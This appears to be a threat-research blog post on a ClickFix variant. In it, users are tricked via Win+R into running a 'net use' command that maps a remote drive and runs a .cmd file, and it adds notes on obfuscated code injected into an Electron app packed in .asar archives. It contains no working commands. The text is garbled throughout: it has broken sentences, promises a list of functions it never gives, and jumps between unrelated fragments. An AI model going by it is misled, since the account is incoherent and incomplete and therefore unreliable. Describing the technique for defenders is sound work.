Investigating a New Click-Fix Variant

This report was made by the Threat Research Center to raise awareness of cybersecurity and help improve defense capabilities This article explores harmful command device. . It is based on research done by people who are not connected to the government and what they saw about the threat landscape at the time it was published.

The information is only meant to be used for informational and planning purposes. Read more blogs about threat intelligence and research on your enemies: Atos: https://atos.net/en/lp/cybershield Researchers found a new version of the well-known ClickFix method. In this version, attackers use the Win + R shortcut to trick the user into running a harmful command on their own device. In this version, a "net use" command is used to map a network drive from an outside server.

Then, a ".cmd" batch file that is on that drive is run.

Instead of well-structured scripts, they used a heavily obfuscated on-liner structure, which added malicious code on top of legitimate code, making sure it ran first and blocking WorkFlowy functionality. Malicious code has a number of important functions: If the C2 connection isn't made, no files or folders are made. The C2 domain was already unresponsive when this analysis was done.

Why Electron Works Well as a Delivery System The bad code runs in the main Node.js process, which is outside of the Chromium sandbox. It has full access to everything the logged-in user can do on the system, so it can do anything the user is allowed to do.

No files are actually written to disk, and the malicious payload is packed into a ".asar" archive, which makes it harder to find.